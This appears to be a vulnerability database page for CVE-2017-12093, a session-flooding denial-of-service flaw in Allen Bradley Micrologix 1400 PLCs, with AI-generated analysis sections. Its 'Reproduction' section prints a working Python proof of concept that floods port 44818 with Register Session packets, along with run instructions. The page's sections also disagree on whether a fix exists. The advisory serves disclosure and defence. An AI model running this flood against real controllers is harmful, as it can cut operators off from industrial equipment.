CVE-2017-12093
Description
An exploitable insufficient resource pool vulnerability exists in the session communication functionality of Allen Bradley Micrologix 1400 Series B Firmware 21.2 and before. A specially crafted stream of packets can cause a flood of the session resource pool resulting in legitimate connections to the PLC being disconnected. An attacker can send unauthenticated packets to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
An insufficient resource pool vulnerability in Allen Bradley Micrologix 1400 allows unauthenticated attackers to disconnect legitimate sessions via a flood of session packets.
Vulnerability
The vulnerability exists in the session communication functionality of Allen Bradley Micrologix 1400 Series B Firmware versions 21.2 and prior. The PLC supports up to ten active connections; when a new connection request arrives while the pool is full, it disconnects the oldest connection. By sending a flood of "Register Session" packets, an attacker can repeatedly trigger disconnections [1].
Exploitation
An unauthenticated attacker can send a specially crafted stream of packets over the network (default port 44818) to the PLC. This causes a loop of session registrations, disconnecting legitimate connections. A user in an online RSLogix session receives a communications loss alert and can attempt to reconnect, but if the flood continues, the legitimate session is quickly pushed out again [1].
Impact
The attack results in denial of service: legitimate users (RSLinx/RSLogix sessions) are disconnected from the PLC, preventing access. The PLC continues to operate in its current state, but remote access is disrupted. Confidentiality and integrity are not affected, but availability is compromised (CVSS 5.3) [1].
Mitigation
Rockwell Automation has released firmware version 21.3 to address this vulnerability. Users are advised to update to the latest firmware. No workarounds are mentioned in the advisory. The CVE is not in KEV as of now [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: <=21.2
- Talos/Allen Bradleyv5Range: Allen Bradley Micrologix 1400 Series B FRN 21.2, Allen Bradley Micrologix 1400 Series B FRN 21.0, Allen Bradley Micrologix 1400 Series B FRN 15
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient resource pool management: the PLC allows unauthenticated session registration packets to exhaust the limited connection pool (10 max), evicting legitimate sessions without rate-limiting or prioritization."
Attack vector
An unauthenticated attacker on the network sends a crafted stream of "Register Session" packets to the PLC on EtherNet/IP port 44818 (default). The Micrologix 1400 supports only ten active connections at a time; when a new connection request arrives while all slots are full, the PLC disconnects the oldest connection to make room. By flooding the device with these packets in a loop, the attacker continuously forces out legitimate RSLinx/RSLogix sessions, causing a denial-of-service condition where authorized users cannot maintain access to the PLC [ref_id=1].
Affected code
The vulnerability resides in the session communication functionality of the Allen Bradley Micrologix 1400 Series B firmware (FRN 21.2 and earlier). The PLC's session management code handles "Register Session" packets (the same type used by RSLinx to create connections) but does not rate-limit or throttle incoming session registration requests [ref_id=1].
What the fix does
The advisory does not include a patch or specific remediation code. The vendor disclosure timeline shows the issue was reported on 2017-09-22 and publicly released on 2018-03-28, but no fix is described in the reference write-up [ref_id=1]. Mitigation would require implementing rate-limiting or a cap on session registration requests per time window, or modifying the connection eviction policy so that unauthenticated session requests cannot displace established authenticated sessions.
Preconditions
- networkAttacker must have network access to the target PLC on port 44818 (EtherNet/IP)
- authNo authentication required; packets are sent unauthenticated
- inputThe PLC must have at least one active legitimate session to be disrupted (though the attack works regardless)
Reproduction
The following Python script (from the Talos advisory) sends a flood of "Register Session" packets to the target PLC, exhausting the session resource pool and disconnecting legitimate connections [ref_id=1]:
``` import argparse import socket
parser = argparse.ArgumentParser() parser.add_argument("-i", "--ipaddr", help="target ip address", type=str) parser.add_argument("-p", "--port", help="target port", default=44818, type=int) parser.add_argument("-n", "--numpackets", help="the number of packets to send", default=100000, type=int) args = parser.parse_args() dst = args.ipaddr port = args.port num_packets = args.numpackets def register_session(): registersession_data = "\x65\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x28\x1e\x4d\x00\x00\x00\x00\x01\x00\x00\x00" sock.send(registersession_data)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((dst, port)) for i in range(num_packets): register_session() sock.shutdown(socket.SHUT_RDWR) sock.close() ```
Run as: `python script.py -i <PLC_IP> [-p <port>] [-n <num_packets>]`
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.talosintelligence.com/vulnerability_reports/TALOS-2017-0445mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.